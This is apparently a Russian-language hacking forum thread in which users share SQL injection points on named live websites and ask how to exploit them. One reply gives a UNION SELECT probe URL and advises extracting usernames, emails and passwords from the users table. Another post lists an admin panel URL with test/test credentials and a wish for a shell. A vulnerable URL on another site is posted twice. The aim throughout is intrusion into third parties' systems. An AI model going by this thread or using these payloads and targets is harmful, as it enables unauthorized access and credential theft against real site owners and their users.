Народ на сайте нашел уязвимость пишет
MySQL query error.
Query was: SELECT subj,text FROM message WHERE id=
MySQL returned: 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
$REQUEST_URI:
/start.php?page=email&act=ch&id=

Что с ней можно зделать???
Я просто некокгда дело с sql инъекциями не имел :(

обратись по браузеру так:
/start.php?page=email&act=ch&id=-1+union+select+1,2
если ошибки не будет и в исходном коде ты явно увидишь 1 или 2, то попробуй достать данные из таблицы юзеров с мылами, логинами, паролям к ним. Только сразу помотри там есть страничка авторизации например, а то народ находит инекции, а что делать с ними не знает.
ps читай статьи

http://cms.lionmobile.com/admin.php
Логин test
Пасс test
хотелось шелл =)

vot SQL INJ
http://www.g19yfl.com/schedules/fieldSchedule.php?ID=33'

pokazite chto mozno sdelat
failu ne chitaet a nazvaniya tables ya ne znau kak uznat :(

vot SQL INJ
http://www.g19yfl.com/schedules/fieldSchedule.php?ID=33'

pokazite chto mozno sdelat
failu ne chitaet a nazvaniya tables ya ne znau kak uznat :(
Мне тоже интересно стало, что там можно сделать? Там sql-inj эта подставляется сразу в два запроса с разным количеством полей. И в одном из них еще надо, чтобы возвращалась только одна строка.
Надо думать еще....
Вечером еще попробую... Если у кого-нить получится че-нить, отпишите как...